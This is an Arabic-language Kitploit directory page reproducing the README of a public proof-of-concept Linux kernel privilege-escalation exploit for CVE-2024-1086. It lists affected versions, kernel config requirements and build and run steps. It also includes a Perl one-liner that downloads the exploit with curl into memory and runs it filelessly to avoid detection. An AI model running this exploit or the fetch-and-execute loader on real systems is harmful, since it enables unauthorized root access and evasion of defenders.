Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-1086 — استغلال تصعيد الامتيازات المحلي لـ CVE-2024-1086 يستهدف نوى لينكس v5.14–v6.6 بمعدل نجاح 99.4% على KernelCTF. يتضمن دعم التنفيذ دون ملفات لاختبار الاختراق. | Kitploit
أدوات/GitHubGitHub/ccievoice2009/cve-2024-1086
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubccievoice2009/cve-2024-1086

CVE-2024-1086

استغلال تصعيد الامتيازات المحلي لـ CVE-2024-1086 يستهدف نوى لينكس v5.14–v6.6 بمعدل نجاح 99.4% على KernelCTF. يتضمن دعم التنفيذ دون ملفات لاختبار الاختراق.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-1086

استغلال لإثبات المفهوم لتصعيد الامتيازات المحلية العالمي لـ CVE-2024-1086، يعمل على معظم نوى لينكس بين v5.14 و v6.6، بما في ذلك Debian و Ubuntu و KernelCTF. معدل النجاح هو 99.4% في صور KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

مقال / شرح كامل

يمكن العثور على شرح كامل للاستغلال - بما في ذلك معلومات الخلفية والعديد من المخططات المفيدة - في مقال Flipping Pages.

الإصدارات المتأثرة

يؤثر الاستغلال على الإصدارات من (بما في ذلك) v5.14 إلى (بما في ذلك) v6.6، باستثناء الفروع المصححة v5.15.149> و v6.1.76> و v6.6.15>. تم إصدار التصحيح لهذه الإصدارات في فبراير 2024. تؤثر الثغرة الأساسية على جميع الإصدارات (باستثناء الفروع المستقرة المصححة) من v3.15 إلى v6.8-rc1.

ملاحظات:

  • الاستغلال لا يعمل على نوى v6.4> مع kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (بما في ذلك Ubuntu v6.5)
  • يتطلب الاستغلال مساحات أسماء المستخدمين (kconfig CONFIG_USER_NS=y) وأن تكون مساحات الأسماء هذه غير مميزة (أمر sh sysctl kernel.unprivileged_userns_clone = 1)، وأن يتم تمكين nf_tables (kconfig CONFIG_NF_TABLES=y). افتراضيًا، كل هذه الأمور ممكّنة على Debian و Ubuntu و KernelCTF. لم يتم اختبار توزيعات أخرى، لكنها قد تعمل أيضًا. بالإضافة إلى ذلك، تم اختبار الاستغلال فقط على x64/amd64.
  • قد يكون الاستغلال غير مستقر جدًا على الأنظمة ذات النشاط الشبكي العالي
    • الأنظمة المزودة بمحول WiFi، عند وجود شبكات WiFi عالية الاستخدام حولها، ستكون غير مستقرة جدًا.
    • على أجهزة الاختبار، يرجى إيقاف تشغيل محولات WiFi عبر BIOS.
  • تعطل النواة (انهيار النظام) بعد تشغيل الاستغلال هو أثر جانبي لم يتم إصلاحه عمدًا لمنع الاستخدام الخبيث للاستغلال (أي محاولات الاستغلال يجب أن تكون الآن أكثر وضوحًا وغير عملية في العمليات الواقعية). على الرغم من ذلك، فإنه لا يزال يسمح بإثبات مفهوم عملي في بيئات المختبر، حيث أن جذر shell يعمل، والإمكانية للاستمرارية عبر القرص ممكنة.

الاستخدام

الإعدادات

القيم الافتراضية يجب أن تعمل فورًا على Debian و Ubuntu و KernelCTF باستخدام shell محلي. على الإعدادات/التوزيعات غير المختبرة، يرجى التأكد من أن قيم kconfig تتطابق مع نواة الهدف. يمكن تحديد هذه القيم في src/config.h. إذا كنت تشغل الاستغلال على جهاز به أكثر من 32GiB من الذاكرة الفعلية، تأكد من زيادة CONFIG_PHYS_MEM. إذا كنت تشغل الاستغلال عبر SSH (إلى الجهاز الهدف) أو reverse shell، قد ترغب في تعيين CONFIG_REDIRECT_LOG إلى 1 لتجنب النشاط الشبكي غير الضروري.

البناء

إذا كان هذا غير عملي بالنسبة لك، فهناك ملف ثنائي مُجمّع x64 مع الإعدادات الافتراضية.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

الملف الثنائي: CVE-2024-1086/exploit

التشغيل

تشغيل الاستغلال بنفس السهولة:

root@kitploit:~
./exploit

التنفيذ بدون ملفات مدعوم أيضًا، في حالات اختبار الاختراق حيث يجب تجنب الكشف. ومع ذلك، يجب تثبيت Perl على الهدف:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

إخلاء مسؤولية

البرامج والنصوص البرمجية ("البرامج") في دليل/مجلد/مستودع البرامج هذا ("المستودع") يتم نشرها وتطويرها وتوزيعها لأغراض تعليمية/بحثية فقط. أنا ("المنشئ") لا أؤيد أي استخدام ضار أو غير قانوني للبرامج في هذا المستودع، حيث أن القصد هو مشاركة البحث وليس القيام بأنشطة غير قانونية به. أنا لست مسؤولاً قانونياً عن أي شيء تفعله بالبرامج في هذا المستودع.

تنزيل الأداة